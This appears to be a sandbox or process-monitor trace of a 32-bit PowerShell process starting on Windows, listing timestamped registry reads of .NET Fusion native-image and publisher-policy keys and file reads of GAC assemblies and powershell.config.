00:04:985 Registry HKLM\Software\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\c991064\2bd33e1c\79
Read LastModTime

Registry HKLM\Software\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\41c04c7e\7f3b6ac4\78
00:04:985
Read SIG

Registry HKLM\Software\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\41c04c7e\7f3b6ac4\78
00:04:985
Read LastModTime

Registry HKLM\Software\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\c991064\2bd33e1c\79
00:04:985
Read DisplayName

File
00:05:000 Operations, Searched a directory for the name: C:\Windows\assembly\GAC_MSIL\System.Configuration.Install\2.0.0.0__b03f5f7f11d50a3a\System.Configuration.Install.INI
miscellaneous

Registry HKLM\Software\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\NI\34cea914\43f5e26f\26
00:05:063
Read DisplayName

Registry HKLM\Software\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\39f21844\3feac0d8\25
00:05:063
Read DisplayName

Registry HKLM\Software\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\NI\34cea914\43f5e26f\26
00:05:063
Read EvalationData

Registry HKLM\Software\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\NI\34cea914\43f5e26f\26
00:05:063
Read MissingDependencies

Registry HKLM\Software\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\NI\34cea914\43f5e26f\26
00:05:063
Read ConfigString

Registry HKLM\Software\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\43f5e26f\3b5d08db\26
00:05:063
Read Status

Registry HKLM\Software\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\NI\34cea914\43f5e26f\26
00:05:063
Read MVID

Registry HKLM\Software\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\43f5e26f\3b5d08db\26
00:05:063
Read DisplayName

Registry HKLM\Software\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\43f5e26f\3b5d08db\26
00:05:063
Read LastModTime

Registry HKLM\Software\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\NI\34cea914\43f5e26f\26
00:05:063
Read ConfigMask

Registry HKLM\Software\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\NI\34cea914\43f5e26f\26
00:05:063
Read NIDependencies

Registry HKLM\Software\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\43f5e26f\3b5d08db\26
00:05:063
Read SIG

Registry HKLM\Software\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\43f5e26f\3b5d08db\26
00:05:063
Read Modules

Registry HKLM\Software\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\NI\34cea914\43f5e26f\26
00:05:063
Read ILDependencies

Registry HKLM\Software\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\3c9c8d7b\46b95040\6c
00:05:063
Read Modules

Registry HKLM\Software\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\39f21844\3feac0d8\25
00:05:063
Read Status

Registry HKLM\Software\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\39f21844\3feac0d8\25
00:05:063
Read SIG

Registry HKLM\Software\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\3c9c8d7b\46b95040\6c
00:05:063
Read DisplayName

Registry
00:05:063 HKLM\Software\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\NI\34cea914\43f5e26f\26
Opened

Registry
00:05:063 HKLM\Software\Microsoft\Fusion\PublisherPolicy\Default\policy.1.0.Microsoft.WSMan.Management__31bf3856ad364e35
Opened

Registry HKLM\Software\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\39f21844\3feac0d8\25
00:05:063
Read Modules

Registry
00:05:063 HKLM\Software\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\NI\34cea914\43f5e26f
Opened

Registry HKLM\Software\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\3c9c8d7b\46b95040\6c
00:05:063
Read LastModTime

Registry HKLM\Software\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\3c9c8d7b\46b95040\6c
00:05:063
Read SIG

Registry HKLM\Software\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\3c9c8d7b\46b95040\6c
00:05:063
Read Status

Registry
00:05:063 HKLM\Software\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\43f5e26f\3b5d08db\26
Opened

Registry
00:05:063 HKLM\Software\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\3c9c8d7b\46b95040\6c
Opened

Registry
00:05:063 HKLM\Software\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\39f21844\3feac0d8\25
Opened
Registry HKLM\Software\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\39f21844\3feac0d8\25
00:05:063
Read LastModTime

00:05:063 Registry HKLM\Software\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\NI\34cea914\43f5e26f\26


Read Status

Registry HKLM\Software\Microsoft\Fusion\GACChangeNotification\Default
00:05:079
Read System.ServiceProcess,2.0.0.0,,b03f5f7f11d50a3a,MSIL

Registry
00:05:079 HKLM\Software\Microsoft\Fusion\PublisherPolicy\Default\policy.1.0.Microsoft.WSMan.Runtime__31bf3856ad364e35
Opened

File
Searched a directory for the name:
00:05:079 Operations,
C:\Windows\assembly\GAC_MSIL\Microsoft.WSMan.Management\1.0.0.0__31bf3856ad364e35\Microsoft.WSMan.Management.INI
miscellaneous

Registry
00:05:079 HKLM\Software\Microsoft\Fusion\PublisherPolicy\Default\policy.2.0.System.ServiceProcess__b03f5f7f11d50a3a
Opened

Registry HKLM\Software\Microsoft\Fusion\GACChangeNotification\Default
00:05:079
Read Microsoft.WSMan.Runtime,1.0.0.0,,31bf3856ad364e35,MSIL

Registry HKLM\Software\Microsoft\Fusion\GACChangeNotification\Default
00:05:079
Read Microsoft.WSMan.Management,1.0.0.0,,31bf3856ad364e35,MSIL

C:\Windows\assembly\GAC_MSIL\Microsoft.WSMan.Runtime\1.0.0.0__31bf3856ad364e35\Microsoft.WSMan.Runtime.dll
Files Read
00:05:079
Opened Normal

00:05:093 Files Read C:\Windows\assembly\GAC_MSIL\Microsoft.WSMan.Management\1.0.0.0__31bf3856ad364e35\Microsoft.WSMan.Management.dll

Registry HKLM\Software\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\85e83df\4c239d82\71
00:05:110
Read Modules

Registry HKLM\Software\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\85e83df\4c239d82\71
00:05:110
Read LastModTime

Registry HKLM\Software\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\85e83df\4c239d82\71
00:05:110
Read DisplayName

Registry HKLM\Software\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\85e83df\4c239d82\71
00:05:110
Read SIG

Registry HKLM\Software\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\85e83df\4c239d82\71
00:05:110
Read Status

Registry
00:05:110 HKLM\Software\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\NI\6eae2d34\3b249b34\71
Opened

Registry
00:05:110 HKLM\Software\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\NI\6eae2d34\3b249b34
Opened

Registry HKLM\Software\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\NI\6eae2d34\3b249b34\71
00:05:110
Read Status

Registry HKLM\Software\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\NI\6eae2d34\3b249b34\71
00:05:110
Read NIDependencies

Registry HKLM\Software\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\NI\6eae2d34\3b249b34\71
00:05:110
Read MissingDependencies

Registry HKLM\Software\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\NI\6eae2d34\3b249b34\71
00:05:110
Read MVID

Registry HKLM\Software\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\NI\6eae2d34\3b249b34\71
00:05:110
Read ILDependencies

Registry
00:05:110 HKLM\Software\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\85e83df\4c239d82\71
Opened

00:05:110 Registry HKLM\Software\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\NI\6eae2d34\3b249b34\71


Read EvalationData

Registry HKLM\Software\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\NI\6eae2d34\3b249b34\71
00:05:110
Read DisplayName

Registry HKLM\Software\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\NI\6eae2d34\3b249b34\71
00:05:110
Read ConfigString

Registry HKLM\Software\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\NI\6eae2d34\3b249b34\71
00:05:110
Read ConfigMask

File
00:05:125 Operations, Searched a directory for the name: C:\Windows\assembly\GAC_32\System.Transactions\2.0.0.0__b77a5c561934e089\System.Transactions.INI
miscellaneous

Registry
00:05:125 HKLM\Software\Microsoft\Fusion\PublisherPolicy\Default\policy.2.0.System.EnterpriseServices__b03f5f7f11d50a3a
Opened

Registry HKLM\Software\Microsoft\Fusion\GACChangeNotification\Default
00:05:125
Read System.EnterpriseServices,2.0.0.0,,b03f5f7f11d50a3a,x86

C:\Windows\assembly\GAC_32\System.Transactions\2.0.0.0__b77a5c561934e089\System.Transactions.dll
Files Read
00:05:140
Opened Normal

C:\Windows\assembly\GAC_32\System.Transactions\2.0.0.0__b77a5c561934e089\System.Transactions.dll
00:05:140 Files Read
Opened 8000000

Registry
00:05:171 HKLM\Software\Microsoft\Fusion\PublisherPolicy\Default\policy.1.0.Microsoft.PowerShell.Commands.Utility__31bf3856ad364e35
Opened

Registry
00:05:171 HKLM\Software\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\NI\56d30baa\7df4ed04
Opened

Registry
00:05:171 HKLM\Software\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\NI\56d30baa\7df4ed04\35
Opened

Registry HKLM\Software\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\7df4ed04\78e5e798\35
00:05:188
Read Status

Registry HKLM\Software\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\7df4ed04\78e5e798\35
00:05:188
Read SIG

Registry HKLM\Software\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\7df4ed04\78e5e798\35
00:05:188
Read Modules

Registry HKLM\Software\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\7df4ed04\78e5e798\35
00:05:188
Read LastModTime

Registry HKLM\Software\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\7df4ed04\78e5e798\35
00:05:188
Read DisplayName

Registry HKLM\Software\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\NI\56d30baa\7df4ed04\35
00:05:188
Read MissingDependencies

Registry HKLM\Software\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\NI\56d30baa\7df4ed04\35
00:05:188
Read NIDependencies

Registry HKLM\Software\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\NI\56d30baa\7df4ed04\35
00:05:188
Read Status

Registry HKLM\Software\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\6dc7d4c0\a5cd4db\7e
00:05:188
Read Status

Registry HKLM\Software\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\6dc7d4c0\a5cd4db\7e
00:05:188 Read SIG

Registry HKLM\Software\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\6dc7d4c0\a5cd4db\7e
00:05:188
Read Modules

Registry HKLM\Software\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\6dc7d4c0\a5cd4db\7e
00:05:188
Read LastModTime

Registry HKLM\Software\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\6dc7d4c0\a5cd4db\7e
00:05:188
Read DisplayName

Registry HKLM\Software\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\24bf93f6\455bab30\6e
00:05:188
Read SIG

Registry HKLM\Software\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\141dfd70\6b79efab\43
00:05:188
Read LastModTime

Registry HKLM\Software\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\NI\56d30baa\7df4ed04\35
00:05:188
Read ILDependencies

Registry HKLM\Software\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\24bf93f6\455bab30\6e
00:05:188
Read DisplayName

Registry HKLM\Software\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\NI\56d30baa\7df4ed04\35
00:05:188
Read EvalationData

Registry HKLM\Software\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\NI\56d30baa\7df4ed04\35
00:05:188
Read DisplayName

Registry HKLM\Software\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\24bf93f6\455bab30\6e
00:05:188
Read LastModTime

Registry HKLM\Software\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\24bf93f6\455bab30\6e
00:05:188
Read Modules

Registry HKLM\Software\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\24bf93f6\455bab30\6e
00:05:188
Read Status

Registry HKLM\Software\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\NI\56d30baa\7df4ed04\35
00:05:188
Read ConfigString

Registry HKLM\Software\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\NI\56d30baa\7df4ed04\35
00:05:188
Read ConfigMask

Registry
00:05:188 HKLM\Software\Microsoft\Fusion\PublisherPolicy\Default\policy.2.0.System.Web__b03f5f7f11d50a3a
Opened

Registry HKLM\Software\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\141dfd70\6b79efab\43
00:05:188
Read Status

Registry HKLM\Software\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\141dfd70\6b79efab\43
00:05:188
Read SIG

Registry HKLM\Software\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\141dfd70\6b79efab\43
00:05:188
Read Modules

Registry HKLM\Software\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\141dfd70\6b79efab\43
00:05:188
Read DisplayName
Registry HKLM\Software\Microsoft\Fusion\GACChangeNotification\Default
00:05:188
Read System.Web,2.0.0.0,,b03f5f7f11d50a3a,x86

Registry HKLM\Software\Microsoft\Fusion\GACChangeNotification\Default
00:05:188
Read System.Drawing,2.0.0.0,,b03f5f7f11d50a3a,MSIL

Registry
00:05:188 HKLM\Software\Microsoft\Fusion\PublisherPolicy\Default\policy.8.0.Microsoft.JScript__b03f5f7f11d50a3a
Opened

Registry
00:05:188 HKLM\Software\Microsoft\Fusion\PublisherPolicy\Default\policy.2.0.System.Drawing__b03f5f7f11d50a3a
Opened

Registry HKLM\Software\Microsoft\Fusion\GACChangeNotification\Default
00:05:188
Read Microsoft.PowerShell.Commands.Utility,1.0.0.0,,31bf3856ad364e35,MSIL

Registry HKLM\Software\Microsoft\Fusion\GACChangeNotification\Default
00:05:188
Read Microsoft.JScript,8.0.0.0,,b03f5f7f11d50a3a,MSIL

Registry
00:05:188 HKLM\Software\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\7df4ed04\78e5e798\35
Opened

Registry HKLM\Software\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\NI\56d30baa\7df4ed04\35
00:05:188
Read MVID

Registry
00:05:188 HKLM\Software\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\6dc7d4c0\a5cd4db\7e
Opened

Registry
00:05:188 HKLM\Software\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\24bf93f6\455bab30\6e
Opened

Registry
00:05:188 HKLM\Software\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\141dfd70\6b79efab\43
Opened

File
Searched a directory for the name:
00:05:204 Operations,
C:\Windows\assembly\GAC_MSIL\Microsoft.PowerShell.Commands.Utility\1.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.Commands.Utility.INI
miscellaneous

00:05:204 Files Read C:\Windows\assembly\GAC_MSIL\Microsoft.PowerShell.Commands.Utility\1.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.Commands.Utility.dll

00:05:218 Files Read C:\Windows\assembly\GAC_MSIL\Microsoft.PowerShell.ConsoleHost\1.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.ConsoleHost.dll

Registry HKLM\Software\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\74219a81\7cb419c4\36
00:05:235
Read Modules

Registry HKLM\Software\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\2b351479\2a0ed676\6a
00:05:235
Read Status

Registry HKLM\Software\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\2b351479\2a0ed676\6a
00:05:235
Read Modules

Registry HKLM\Software\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\2b351479\2a0ed676\6a
00:05:235
Read LastModTime

Registry
00:05:235 HKLM\Software\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\2b351479\2a0ed676\6a
Opened

Registry HKLM\Software\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\2b351479\2a0ed676\6a
00:05:235
Read DisplayName

Registry
00:05:235 HKLM\Software\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\74219a81\7cb419c4\36
Opened

Registry
00:05:235 HKLM\Software\Microsoft\Fusion\PublisherPolicy\Default\policy.1.0.Microsoft.PowerShell.Commands.Management__31bf3856ad364e35
Opened

Registry HKLM\Software\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\2b351479\2a0ed676\6a
00:05:235
Read SIG

Registry HKLM\Software\Microsoft\Fusion\GACChangeNotification\Default
00:05:235
Read Microsoft.PowerShell.Commands.Management,1.0.0.0,,31bf3856ad364e35,MSIL

Registry
00:05:235 HKLM\Software\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\NI\5bec2d27\74219a81\36
Opened

Registry HKLM\Software\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\NI\5bec2d27\74219a81\36
00:05:235
Read ConfigMask

Registry HKLM\Software\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\NI\5bec2d27\74219a81\36
00:05:235
Read ConfigString

Registry HKLM\Software\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\NI\5bec2d27\74219a81\36
00:05:235
Read DisplayName

Registry HKLM\Software\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\74219a81\7cb419c4\36
00:05:235
Read DisplayName

Registry HKLM\Software\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\74219a81\7cb419c4\36
00:05:235
Read SIG

Registry HKLM\Software\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\74219a81\7cb419c4\36
00:05:235
Read Status

Registry
00:05:235 HKLM\Software\Microsoft\Fusion\PublisherPolicy\Default\policy.2.0.System.Web.Services__b03f5f7f11d50a3a
Opened

Registry HKLM\Software\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\NI\5bec2d27\74219a81\36
00:05:235
Read MissingDependencies
00:05:235 Registry HKLM\Software\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\NI\5bec2d27\74219a81\36
Read NIDependencies
Registry HKLM\Software\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\NI\5bec2d27\74219a81\36
00:05:235
Read Status

Registry
00:05:235 HKLM\Software\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\NI\5bec2d27\74219a81
Opened

Registry HKLM\Software\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\NI\5bec2d27\74219a81\36
00:05:235
Read MVID

Registry HKLM\Software\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\NI\5bec2d27\74219a81\36
00:05:235
Read ILDependencies

Registry HKLM\Software\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\NI\5bec2d27\74219a81\36
00:05:235
Read EvalationData

Registry HKLM\Software\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\74219a81\7cb419c4\36
00:05:235
Read LastModTime

Registry HKLM\Software\Microsoft\Fusion\GACChangeNotification\Default
00:05:235
Read System.Web.Services,2.0.0.0,,b03f5f7f11d50a3a,MSIL

File
Searched a directory for the name:
00:05:250 Operations,
C:\Windows\assembly\GAC_MSIL\Microsoft.PowerShell.Commands.Management\1.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.Commands.Management.INI
miscellaneous

00:05:265 Files Read C:\Windows\assembly\GAC_MSIL\Microsoft.PowerShell.Commands.Management\1.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.Commands.Management.dll

Registry
00:05:282 HKLM\Software\Microsoft\Fusion\PublisherPolicy\Default\policy.1.0.Microsoft.PowerShell.Security__31bf3856ad364e35
Opened

Registry
00:05:282 HKLM\Software\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\NI\19aba884\259d21de
Opened

Registry
00:05:282 HKLM\Software\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\NI\19aba884\259d21de\2f
Opened

Registry
00:05:282 HKLM\Software\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\259d21de\372b3ce5\2f
Opened

Registry HKLM\Software\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\NI\19aba884\259d21de\2f
00:05:282
Read NIDependencies

Registry HKLM\Software\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\NI\19aba884\259d21de\2f
00:05:282 Read ConfigMask

Registry HKLM\Software\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\259d21de\372b3ce5\2f
00:05:282
Read Status

Registry HKLM\Software\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\259d21de\372b3ce5\2f
00:05:282
Read SIG

Registry HKLM\Software\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\259d21de\372b3ce5\2f
00:05:282
Read Modules

Registry HKLM\Software\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\259d21de\372b3ce5\2f
00:05:282
Read LastModTime

Registry HKLM\Software\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\259d21de\372b3ce5\2f
00:05:282
Read DisplayName

Registry HKLM\Software\Microsoft\Fusion\GACChangeNotification\Default
00:05:282
Read Microsoft.PowerShell.Security,1.0.0.0,,31bf3856ad364e35,MSIL

Registry HKLM\Software\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\NI\19aba884\259d21de\2f
00:05:282
Read Status

Registry HKLM\Software\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\NI\19aba884\259d21de\2f
00:05:282
Read MissingDependencies

Registry HKLM\Software\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\NI\19aba884\259d21de\2f
00:05:282
Read MVID

Registry HKLM\Software\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\NI\19aba884\259d21de\2f
00:05:282
Read ConfigString

Registry HKLM\Software\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\NI\19aba884\259d21de\2f
00:05:282
Read ILDependencies

Registry HKLM\Software\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\NI\19aba884\259d21de\2f
00:05:282
Read DisplayName

Registry HKLM\Software\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\NI\19aba884\259d21de\2f
00:05:282
Read EvalationData

00:05:296 Files Read C:\Windows\assembly\GAC_MSIL\Microsoft.PowerShell.Security\1.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.Security.dll

File
00:05:296 Operations, Searched a directory for the name: C:\Windows\assembly\GAC_MSIL\Microsoft.PowerShell.Security\1.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.Security.INI
miscellaneous

Registry
00:05:329 HKLM\Software\Microsoft\Fusion\PublisherPolicy\Default\policy.1.0.Microsoft.PowerShell.ConsoleHost.resources_en-US_31bf3856ad364e35
Opened

00:05:329 Files Read C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.config

Registry
00:05:329 HKLM\Software\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\NI\2b1373f4\4f4f14cc
Opened
Registry HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Installer\Managed\S-1-5-21-2969830022-2362906686-2146684197-
00:05:343
Opened 500\Installer\Assemblies\C:|Windows|SysWOW64|WindowsPowerShell|v1.0|powershell.exe

Registry
00:05:343 HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Installer\Managed\S-1-5-21-2969830022-2362906686-2146684197-500\Installer\Assemblies\Global
Opened

Registry
00:05:343 HKCU\Software\Microsoft\Installer\Assemblies\C:|Windows|SysWOW64|WindowsPowerShell|v1.0|powershell.exe
Opened

Registry
00:05:343 HKCU\Software\Microsoft\Installer\Assemblies\Global
Opened

Registry
00:05:343 Opened HKLM\SOFTWARE\Classes\Installer\Assemblies\C:|Windows|SysWOW64|WindowsPowerShell|v1.0|powershell.exe

Registry
00:05:343 HKLM\SOFTWARE\Classes\Installer\Assemblies\Global
Opened

00:05:657 Others Determined whether a specified security identifier (SID) is enabled in an access token

CONOUT$
Files Read & Write
00:05:657
Opened Normal

Registry HKLM\Software\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\NI\6faf58\19ab8d57\86
00:05:718
Read NIDependencies

Registry HKLM\Software\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\NI\6faf58\19ab8d57\86
00:05:718
Read Status

Registry HKLM\Software\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\NI\6faf58\19ab8d57\86
00:05:718
Read MVID

Registry HKLM\Software\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\NI\6faf58\19ab8d57\86
00:05:718
Read ILDependencies

Registry HKLM\Software\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\NI\6faf58\19ab8d57\86
00:05:718
Read EvalationData

Registry
00:05:718 HKLM\Software\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\NI\6faf58\19ab8d57
Opened

Registry
00:05:718 HKLM\Software\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\NI\6faf58\19ab8d57\86
Opened

Registry HKLM\Software\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\NI\6faf58\19ab8d57\86
00:05:718
Read DisplayName

Registry HKLM\Software\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\NI\6faf58\19ab8d57\86
00:05:718
Read ConfigString

Registry HKLM\Software\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\NI\6faf58\19ab8d57\86
00:05:718
Read ConfigMask

Registry HKLM\Software\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\NI\6faf58\19ab8d57\86
00:05:735
Read MissingDependencies

Registry HKLM\Software\Microsoft\Fusion\GACChangeNotification\Default
00:05:735
Read System.Data.SqlXml,2.0.0.0,,b77a5c561934e089,MSIL

Registry HKLM\Software\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\75638fee\7566cac\84
00:05:735
Read SIG

Registry HKLM\Software\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\75638fee\7566cac\84
00:05:735
Read Modules

Registry HKLM\Software\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\75638fee\7566cac\84
00:05:735
Read LastModTime

Registry HKLM\Software\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\75638fee\7566cac\84
00:05:735
Read DisplayName

Registry
00:05:735 HKLM\Software\Microsoft\Fusion\PublisherPolicy\Default\policy.2.0.System.Data.SqlXml__b77a5c561934e089
Opened

Registry HKLM\Software\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\75638fee\7566cac\84
00:05:735
Read Status

00:05:735 Registry HKLM\Software\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\75638fee\7566cac\84


Opened

Registry
00:05:750 HKLM\Software\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\NI\5a8de2c3\2b1a4e4\47
Opened

Registry
00:05:750 HKLM\Software\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\NI\5a8de2c3\2b1a4e4
Opened

File
00:05:750 Operations, Searched a directory for the name: C:\Windows\assembly\GAC_MSIL\System.Xml\2.0.0.0__b77a5c561934e089\System.Xml.INI
miscellaneous

Registry HKLM\Software\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\NI\5a8de2c3\2b1a4e4\47
00:05:750
Read Status

Registry HKLM\Software\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\NI\5a8de2c3\2b1a4e4\47
00:05:750
Read NIDependencies
Registry HKLM\Software\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\NI\5a8de2c3\2b1a4e4\47
00:05:750
Read MissingDependencies

Registry HKLM\Software\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\NI\5a8de2c3\2b1a4e4\47
00:05:750
Read MVID

Registry HKLM\Software\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\NI\5a8de2c3\2b1a4e4\47
00:05:750
Read ILDependencies

Registry HKLM\Software\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\NI\5a8de2c3\2b1a4e4\47
00:05:750
Read EvalationData

Registry HKLM\Software\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\NI\5a8de2c3\2b1a4e4\47
00:05:750
Read DisplayName

Registry HKLM\Software\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\NI\5a8de2c3\2b1a4e4\47
00:05:750
Read ConfigString

